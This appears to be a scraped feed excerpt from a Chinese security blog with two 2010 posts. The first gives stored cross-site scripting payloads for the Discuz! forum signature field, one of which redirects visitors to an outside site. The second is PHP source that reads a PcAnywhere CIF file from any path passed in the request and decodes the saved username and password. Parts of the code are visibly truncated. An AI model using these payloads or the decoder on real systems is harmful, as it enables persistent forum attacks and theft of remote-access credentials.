Security Team Blog » 黑白网络 http://www.secblog.cn 服务器系统架构、优化及网络安全 Tue, 29 Nov 2011 02:15:12 +0000 en hourly 1 http://wordpress.org/?v=3.2.1 Discuz!个性签名跨站漏洞 http://www.secblog.cn/hacker/685.html http://www.secblog.cn/hacker/685.html#comments Wed, 04 Aug 2010 07:04:49 +0000 豬頭濱 http://www.secblog.cn/hacker/685.html

国内很多论坛都用的Discuz!    大家对dz的研究更多了Discuz! 个人中心里的“个人签名”没有对恶意代码进行检测,在 Discuz! 及 img 代码禁用的情况下仍可写入恶意代码,Discuz! 会保存并执行该代码,形成永久型跨站。该漏洞可能导致蠕虫病毒的传播。

虽便选个 Discuz! 论坛我们注册一个用户!
并输入跨站脚本代码 , 以我们个人的签名!
代码:
</textarea><script>alert(/stuhack/);</script><textarea>
也可以写成这样:</textarea><script>alert(/注册成功/);location.href=/http://www.stuhack.com/;</script><textarea>

]]> http://www.secblog.cn/hacker/685.html/feed 0 PcAnywhere在线解密源码 http://www.secblog.cn/hacker/420.html http://www.secblog.cn/hacker/420.html#comments Fri, 30 Jul 2010 03:34:27 +0000 豬頭濱 http://www.secblog.cn/?p=420 <?php
* ———————————————————- */
* PcAnywhere CIF Decode
* QQ:7259561 MSN:cnse8@msn.com
* Blog:http://1v1.name
* ———————————————————- */
rror_reporting(7);
unction PcAnywhere($data, $mode)
{
$Pass=substr($data, 2);
$str =0;
if ($mode == “Pass”)$number=32;
if ($mode == “User”)$number=64;
for ($i=0; $i < $number; $i+=2){
if ($mode == “Pass”)$Cifnum=($str + 144);
if ($mode == “User”)$Cifnum=($str + 15);
$PassWord=((Hexdec(substr($data, $i, 2)) ^ Hexdec(substr($Pass, $i, 2))) ^ $Cifnum);
if (($PassWord <= 32) or ($PassWord > 127))break;
$Num.=chr($PassWord);
$str++;}
return $Num;
}
$path=$_GET['path'];
//”C:\Documents and Settings\All Users\Application Data\Symantec\PcAnywhere\PCA.1v1.name.CIF”
$path=str_replace(“\\\\”,”\\”,$path);
$str =@file_get_contents($path);
$binstr = bin2hex ($str);
echo “Path:”.$path.”<br>”;
echo “User:”. PcAnywhere(substr($binstr,918,64), User).”<br>”;
echo “Pass:”. PcAnywhere(substr($binstr,1176,32), Pass).”<br>”;
?>

在线演示:http://tools88.com/safe/online_pcAnywhere.php

]]> http://www.secblog.cn/hacker/420.html/feed 0